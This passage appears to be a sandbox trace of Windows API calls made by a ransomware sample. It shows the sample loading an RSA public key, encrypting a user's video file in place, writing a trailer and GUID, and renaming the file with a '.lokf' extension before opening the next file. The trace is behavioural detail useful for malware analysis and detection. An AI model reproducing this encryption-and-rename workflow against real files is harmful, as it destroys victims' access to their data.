KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.188] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.188] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8478) returned 1 [0060.189] CryptCreateHash (in: hProv=0x6b8478, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0060.189] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0060.189] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0060.189] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0060.189] GetLastError () returned 0x0 [0060.189] CryptDestroyHash (hHash=0x327cb80) returned 1 [0060.189] CryptReleaseContext (hProv=0x6b8478, dwFlags=0x0) returned 1 [0060.189] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0060.189] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0060.189] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0060.189] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0060.189] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0060.189] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0060.189] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0060.189] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x96b0) returned 0x9c8bae8 [0060.189] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0060.190] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0060.190] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32995a0 [0060.190] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0060.190] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32afc78 [0060.190] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x3296380 [0060.190] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c88dd0 [0060.190] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85bf0 [0060.190] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c88e18 [0060.190] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85c08 [0060.190] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85c38 [0060.190] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857d0 [0060.190] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85c50 [0060.190] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x24) returned 0x32a08a0 [0060.190] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x158) returned 0x9c78728 [0060.190] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0060.190] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x3297a68 [0060.190] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85c38 | out: hHeap=0x660000) returned 1 [0060.190] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85c50 | out: hHeap=0x660000) returned 1 [0060.190] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857d0 | out: hHeap=0x660000) returned 1 [0060.190] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0060.190] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3297a68 | out: hHeap=0x660000) returned 1 [0060.190] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857d0 [0060.190] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f60 [0060.190] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85c50 [0060.190] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3242348 [0060.190] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9) returned 0x9c85c38 [0060.190] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f70 [0060.190] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 0x3234418 [0060.190] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0060.190] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x32964a0 [0060.190] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242688 [0060.190] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x104) returned 0x32452d8 [0060.190] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x32425c8 [0060.190] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0060.190] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0060.190] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85c50 | out: hHeap=0x660000) returned 1 [0060.191] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0060.191] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85c38 | out: hHeap=0x660000) returned 1 [0060.191] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0060.191] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0060.191] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857d0 | out: hHeap=0x660000) returned 1 [0060.191] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0060.191] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3296380 | out: hHeap=0x660000) returned 1 [0060.191] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0060.191] GetCurrentThreadId () returned 0x9e0 [0060.191] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f4e8 [0060.191] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x82) returned 0x9c8a010 [0060.191] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2c) returned 0x3257198 [0060.191] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8478 [0060.191] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x148) returned 0x3201228 [0060.191] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0060.191] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0060.191] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f5f0 [0060.191] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.191] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.191] GetCurrentThreadId () returned 0x9e0 [0060.191] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.191] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.191] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xeb) returned 0x329e1f0 [0060.191] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.191] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.191] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.191] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.191] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e1f0 | out: hHeap=0x660000) returned 1 [0060.191] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f6f8 [0060.191] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0060.191] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4c) returned 0x3261528 [0060.191] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0060.191] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f800 [0060.192] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0060.192] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857d0 [0060.192] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0060.192] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0060.192] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f20 [0060.192] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f50 [0060.192] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f00 [0060.192] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0060.192] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0060.192] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0060.192] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85c38 [0060.192] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0060.192] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f20 [0060.192] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0060.192] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0060.192] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f90 [0060.192] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278fa0 [0060.192] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f80 [0060.192] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85c50 [0060.192] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278fa0 | out: hHeap=0x660000) returned 1 [0060.192] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3242348 [0060.192] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f90 | out: hHeap=0x660000) returned 1 [0060.192] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85c20 [0060.192] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f80 | out: hHeap=0x660000) returned 1 [0060.192] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85770 [0060.192] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0060.192] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f40 [0060.192] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0060.192] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857b8 [0060.192] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0060.192] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857e8 [0060.192] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0060.192] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85c68 [0060.192] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857b8 | out: hHeap=0x660000) returned 1 [0060.192] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c857b8 [0060.193] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857e8 | out: hHeap=0x660000) returned 1 [0060.193] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f50 [0060.193] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0060.193] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3240c48 [0060.193] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0060.193] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x328e3b0 [0060.193] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85c38 | out: hHeap=0x660000) returned 1 [0060.193] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85c38 [0060.193] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0060.193] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x204) returned 0x9c711f0 [0060.193] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857d0 | out: hHeap=0x660000) returned 1 [0060.193] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x3245508 [0060.193] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857b8 | out: hHeap=0x660000) returned 1 [0060.193] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x210) returned 0x326a370 [0060.193] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0060.193] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10c) returned 0x3234418 [0060.193] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0060.193] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x32453f0 [0060.193] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85c38 | out: hHeap=0x660000) returned 1 [0060.193] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x326a588 [0060.193] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3245508 | out: hHeap=0x660000) returned 1 [0060.193] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f908 [0060.193] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0060.193] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8478 | out: hHeap=0x660000) returned 1 [0060.193] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f6f8 | out: hHeap=0x660000) returned 1 [0060.193] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f908 | out: hHeap=0x660000) returned 1 [0060.193] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3240c48 | out: hHeap=0x660000) returned 1 [0060.193] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32453f0 | out: hHeap=0x660000) returned 1 [0060.193] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a370 | out: hHeap=0x660000) returned 1 [0060.193] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a588 | out: hHeap=0x660000) returned 1 [0060.194] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0060.194] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0060.194] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85c68 | out: hHeap=0x660000) returned 1 [0060.194] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0060.194] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85770 | out: hHeap=0x660000) returned 1 [0060.194] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0060.194] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85c50 | out: hHeap=0x660000) returned 1 [0060.194] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85c20 | out: hHeap=0x660000) returned 1 [0060.194] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3201228 | out: hHeap=0x660000) returned 1 [0060.194] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257198 | out: hHeap=0x660000) returned 1 [0060.194] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f5f0 | out: hHeap=0x660000) returned 1 [0060.194] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85c08 | out: hHeap=0x660000) returned 1 [0060.194] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c88e18 | out: hHeap=0x660000) returned 1 [0060.194] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0060.194] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f800 | out: hHeap=0x660000) returned 1 [0060.194] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261528 | out: hHeap=0x660000) returned 1 [0060.194] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32452d8 | out: hHeap=0x660000) returned 1 [0060.194] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242688 | out: hHeap=0x660000) returned 1 [0060.194] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0060.194] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0060.194] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32964a0 | out: hHeap=0x660000) returned 1 [0060.194] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0060.194] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0060.194] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32995a0 | out: hHeap=0x660000) returned 1 [0060.194] WriteFile (in: hFile=0x5cc, lpBuffer=0x9c8bae8*, nNumberOfBytesToWrite=0x96a8, lpNumberOfBytesWritten=0x9f4fb14, lpOverlapped=0x0 | out: lpBuffer=0x9c8bae8*, lpNumberOfBytesWritten=0x9f4fb14*=0x96a8, lpOverlapped=0x0) returned 1 [0060.194] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c8bae8 | out: hHeap=0x660000) returned 1 [0060.194] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x96ad, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.195] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f4e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f4e8*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0060.195] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f4e8 | out: hHeap=0x660000) returned 1 [0060.195] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b4b8 [0060.195] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x428) returned 0x326a370 [0060.195] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", cchWideChar=-1, lpMultiByteStr=0x326a370, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", lpUsedDefaultChar=0x0) returned 41 [0060.195] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x430) returned 0x3294ac8 [0060.195] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a370 | out: hHeap=0x660000) returned 1 [0060.195] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b4b8 | out: hHeap=0x660000) returned 1 [0060.195] WriteFile (in: hFile=0x5cc, lpBuffer=0x3294ac8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x3294ac8*, lpNumberOfBytesWritten=0x9f4fb50*=0x28, lpOverlapped=0x0) returned 1 [0060.195] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3294ac8 | out: hHeap=0x660000) returned 1 [0060.195] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0060.195] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0060.195] CloseHandle (hObject=0x5cc) returned 1 [0060.196] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adce0 [0060.196] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8a0) returned 0x3268798 [0060.196] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adce0 | out: hHeap=0x660000) returned 1 [0060.196] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jYsvlZ\\-zuaS3cxhRUqW6PZe3HQ.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\jysvlz\\-zuas3cxhruqw6pze3hq.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jYsvlZ\\-zuaS3cxhRUqW6PZe3HQ.mp4.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\jysvlz\\-zuas3cxhruqw6pze3hq.mp4.lokf")) returned 1 [0060.197] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0060.197] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0060.197] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.198] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adb18 | out: hHeap=0x660000) returned 1 [0060.198] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90e58450, ftCreationTime.dwHighDateTime=0x1d4c97e, ftLastAccessTime.dwLowDateTime=0xa3dbf820, ftLastAccessTime.dwHighDateTime=0x1d4cdaf, ftLastWriteTime.dwLowDateTime=0xa3dbf820, ftLastWriteTime.dwHighDateTime=0x1d4cdaf, nFileSizeHigh=0x0, nFileSizeLow=0xee4b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="48nag.mkv", cAlternateFileName="")) returned 1 [0060.198] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b4b8 [0060.198] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8e) returned 0x32adb18 [0060.198] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b4b8 | out: hHeap=0x660000) returned 1 [0060.198] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jYsvlZ\\48nag.mkv") returned=".mkv" [0060.198] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jYsvlZ\\48nag.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\jysvlz\\48nag.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0060.198] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=61003) returned 1 [0060.198] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0060.200] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xee25, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.200] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0060.201] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0060.201] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0060.201] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0060.201] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, 